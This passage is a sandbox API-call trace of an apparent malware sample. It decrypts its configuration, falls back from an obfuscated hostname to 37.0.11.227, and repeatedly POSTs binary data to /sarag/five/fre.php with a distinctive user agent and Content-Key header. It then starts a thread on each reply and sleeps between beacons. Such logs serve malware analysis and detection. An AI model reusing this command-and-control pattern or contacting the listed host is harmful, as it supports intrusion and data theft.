[0238.239] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.240] GetProcessHeap () returned 0x690000 [0238.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0238.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.241] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0238.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.242] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0238.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.243] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0238.243] GetProcessHeap () returned 0x690000 [0238.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0238.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.244] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.245] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.246] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.255] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.255] GetProcessHeap () returned 0x690000 [0238.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0238.255] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.256] GetProcessHeap () returned 0x690000 [0238.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0238.256] GetProcessHeap () returned 0x690000 [0238.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0238.256] GetProcessHeap () returned 0x690000 [0238.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0238.257] GetProcessHeap () returned 0x690000 [0238.257] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0238.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.258] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.265] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0238.272] GetProcessHeap () returned 0x690000 [0238.272] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0238.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.273] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0238.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.274] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.275] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.275] GetProcessHeap () returned 0x690000 [0238.276] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0238.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.277] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0238.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.278] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0238.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.279] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0238.279] GetProcessHeap () returned 0x690000 [0238.279] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0238.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.280] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0238.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.283] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0238.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.284] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0238.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.285] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0238.285] GetProcessHeap () returned 0x690000 [0238.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0238.285] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0238.285] GetProcessHeap () returned 0x690000 [0238.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0238.286] socket (af=2, type=1, protocol=6) returned 0x62c [0238.286] connect (s=0x62c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0238.310] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0238.311] GetProcessHeap () returned 0x690000 [0238.311] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0238.311] GetProcessHeap () returned 0x690000 [0238.311] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0238.311] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0238.312] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0238.312] GetProcessHeap () returned 0x690000 [0238.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0238.312] GetProcessHeap () returned 0x690000 [0238.313] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0238.313] GetProcessHeap () returned 0x690000 [0238.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0238.313] GetProcessHeap () returned 0x690000 [0238.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0238.314] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0238.314] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0238.315] GetProcessHeap () returned 0x690000 [0238.315] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0238.315] GetProcessHeap () returned 0x690000 [0238.315] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0238.315] send (s=0x62c, buf=0x6ad508*, len=242, flags=0) returned 242 [0238.316] send (s=0x62c, buf=0x6aba40*, len=159, flags=0) returned 159 [0238.316] GetProcessHeap () returned 0x690000 [0238.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0238.316] recv (in: s=0x62c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0238.384] GetProcessHeap () returned 0x690000 [0238.384] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0238.385] GetProcessHeap () returned 0x690000 [0238.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0238.385] GetProcessHeap () returned 0x690000 [0238.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0238.386] GetProcessHeap () returned 0x690000 [0238.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0238.386] closesocket (s=0x62c) returned 0 [0238.387] GetProcessHeap () returned 0x690000 [0238.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0238.387] GetProcessHeap () returned 0x690000 [0238.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0238.388] GetProcessHeap () returned 0x690000 [0238.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0238.389] GetProcessHeap () returned 0x690000 [0238.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0238.390] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x58c) returned 0x62c [0238.392] Sleep (dwMilliseconds=0xea60) [0238.393] GetProcessHeap () returned 0x690000 [0238.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0238.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.398] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0238.407] GetProcessHeap () returned 0x690000 [0238.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0238.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.410] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0238.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.411] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.412] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.412] GetProcessHeap () returned 0x690000 [0238.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0238.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.416] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0238.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.417] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0238.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.419] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0238.419] GetProcessHeap () returned 0x690000 [0238.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0238.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.420] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.421] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.427] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.428] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.428] GetProcessHeap () returned 0x690000 [0238.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0238.428] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.428] GetProcessHeap () returned 0x690000 [0238.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0238.429] GetProcessHeap () returned 0x690000 [0238.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0238.429] GetProcessHeap () returned 0x690000 [0238.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0238.429] GetProcessHeap () returned 0x690000 [0238.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0238.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.537] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0238.565] GetProcessHeap () returned 0x690000 [0238.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0238.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.567] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0238.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.571] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.572] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.572] GetProcessHeap () returned 0x690000 [0238.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0238.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.574] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0238.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.575] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0238.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.576] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0238.576] GetProcessHeap () returned 0x690000 [0238.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0238.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.578] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0238.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.579] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0238.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.580] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0238.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.581] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0238.581] GetProcessHeap () returned 0x690000 [0238.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0238.581] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0238.581] GetProcessHeap () returned 0x690000 [0238.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0238.581] socket (af=2, type=1, protocol=6) returned 0x630 [0238.582] connect (s=0x630, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0238.613] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0238.613] GetProcessHeap () returned 0x690000 [0238.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0238.613] GetProcessHeap () returned 0x690000 [0238.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0238.613] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0238.615] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0238.615] GetProcessHeap () returned 0x690000 [0238.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0238.615] GetProcessHeap () returned 0x690000 [0238.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0238.615] GetProcessHeap () returned 0x690000 [0238.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0238.615] GetProcessHeap () returned 0x690000 [0238.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0238.616] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0238.617] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0238.617] GetProcessHeap () returned 0x690000 [0238.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0238.617] GetProcessHeap () returned 0x690000 [0238.617] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0238.617] send (s=0x630, buf=0x6ad508*, len=242, flags=0) returned 242 [0238.618] send (s=0x630, buf=0x6aba40*, len=159, flags=0) returned 159 [0238.618] GetProcessHeap () returned 0x690000 [0238.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0238.618] recv (in: s=0x630, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0238.704] GetProcessHeap () returned 0x690000 [0238.705] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0238.705] GetProcessHeap () returned 0x690000 [0238.705] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0238.706] GetProcessHeap () returned 0x690000 [0238.706] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0238.707] GetProcessHeap () returned 0x690000 [0238.707] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0238.708] closesocket (s=0x630) returned 0 [0238.708] GetProcessHeap () returned 0x690000 [0238.708] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0238.708] GetProcessHeap () returned 0x690000 [0238.708] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0238.709] GetProcessHeap () returned 0x690000 [0238.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0238.709] GetProcessHeap () returned 0x690000 [0238.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0238.710] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd14) returned 0x630 [0238.713] Sleep (dwMilliseconds=0xea60) [0238.715] GetProcessHeap () returned 0x690000 [0238.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0238.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.716] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.723] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0238.729] GetProcessHeap () returned 0x690000 [0238.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0238.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.730] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0238.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.731] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.744] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.744] GetProcessHeap () returned 0x690000 [0238.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0238.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.745] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0238.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.746] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0238.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.747] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0238.747] GetProcessHeap () returned 0x690000 [0238.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0238.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.758] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.760] LoadLibraryW (lpLibFileName="shlwapi") returned 